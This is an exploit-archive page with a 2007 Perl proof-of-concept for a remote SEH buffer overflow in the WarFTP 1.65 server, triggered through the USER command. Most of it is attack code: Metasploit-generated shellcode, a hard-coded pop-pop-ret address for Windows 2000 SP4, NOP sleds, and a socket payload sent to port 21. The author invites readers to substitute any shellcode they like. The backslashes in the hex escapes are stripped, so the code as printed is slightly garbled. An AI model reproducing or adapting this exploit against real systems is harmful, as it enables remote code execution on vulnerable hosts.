[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit
# Published : 2007-03-15
# Author : Umesh Wanve
# Previous Title : 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta)
# Next Title : OpenBSD ICMPv6 Fragment Remote Execution Exploit PoC
# ===============================================================================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Preety simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
#
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#use strict;
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my($shellcode)=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42".
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32".
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a".
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c".
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57".
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50".
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d".
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f".
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a".
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76".
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65".
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78".
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f".
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65".
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d".
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31".
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69".
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61".
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70".
"x63x51x71x32x4cx52x43x37x70x42";
my($pointer_to_next_seh)="xebx06x90x90"; # Short Jump
my($seh_handler)="xa9x11x02x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
$exploit = "USER ". #Vulnerable Command
("A"x485). #Buffer
"BBBB". #EIP Overwrites here :)
("x90" x 80). #Garbage
$pointer_to_next_seh.
$seh_handler.
("x90" x 10).
$shellcode. #ur code
("x90" x 10).
"rn";
print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21n";
}
# www.Syue.com [2007-03-15]